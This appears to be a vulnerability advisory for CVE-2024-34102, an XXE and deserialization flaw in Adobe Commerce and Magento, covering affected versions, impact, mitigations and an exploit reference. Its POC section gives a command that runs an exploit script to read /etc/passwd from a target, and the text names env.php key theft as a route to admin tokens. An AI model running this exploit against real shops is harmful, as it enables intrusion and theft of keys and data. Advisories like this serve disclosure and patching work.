Vulnerable Version
Adobe Commerce: versions before: 2.4.7; 2.4.6-p5; 2.4.5-p7; 2.4.4-p8; 2.4.3-ext-7 ; 2.4.2-ext-7
Magento Open Source: versions before: 2.4.7; 2.4.6-p5; 2.4.5-p7; 2.4.4-p8
Adobe Commerce Webhooks Plugin: versions 1.2.0 to 1.4.0
Fixed Version
Update to latest version
Base Score
9.8 Critical
Vendor Description:-
Adobe Commerce and Magento Adobe Commerce are popular e-commerce platforms for establishing and managing online stores. Magento, which was originally open source and is now owned by Adobe, has significant customization options and a powerful feature set for businesses of all kinds. Adobe Commerce, the enterprise edition, expands on these capabilities with new features and seamless interaction with Adobe’s portfolio of marketing and analytics tools, geared mostly to large-scale e-commerce companies.
Vulnerability Description:-
CVE-2024-34102 is a critical security vulnerability in Adobe Commerce and Magento, stemming from improper handling of nested deserialization. This flaw enables attackers to exploit XML External Entities (XXE) during deserialization, potentially leading to remote code execution (RCE). By crafting malicious JSON payloads, attackers can manipulate object properties in unintended ways, creating serious security risks.
Exploitation of this vulnerability grants unauthorized admin access to the REST API, GraphQL API, or SOAP API, which could result in data theft, service disruptions, and full system compromise. A particularly concerning impact is the ability to extract sensitive files, such as app/etc/env.php, which contains cryptographic keys essential for authentication. With this information, attackers can generate administrator tokens and misuse Magento’s APIs with elevated privileges.
Furthermore, CVE-2024-34102 can be combined with other exploits, such as CVE-2024-2961 (PHP filter chains exploit), escalating the threat to remote code execution (RCE). The broader risk of XXE vulnerabilities also allows attackers to extract and manipulate data from external sources, significantly increasing the potential damage to compromised systems.
Impact:-
An unauthenticated remote attacker could exploit this vulnerability to execute arbitrary code, potentially leading to complete system compromise. The attacker could access sensitive data, escalate privileges, and/or gain unauthorized control over the affected Adobe Commerce installation
Mitigations:-
- Apply Security Patches – Update Adobe Commerce & Magento to the latest version.
- Restrict XML Processing – Disable external entity expansion (
libxml_disable_entity_loader()). - Secure API Access – Use OAuth/API keys, restrict API access to trusted IPs, and rotate API tokens.
- Harden Deserialization – Avoid
unserialize(), enforce allowlisting, and prefer JSON parsing.
POC
Exploit – Clickme
Run with local attacker server and local OOB server
python3 exploit.py -t https://magento.test -r "/etc/passwd"
POC Video:-
Reference:-
https://github.com/jakabakos/CVE-2024-34102-CosmicSting-XXE-in-Adobe-Commerce-and-Magento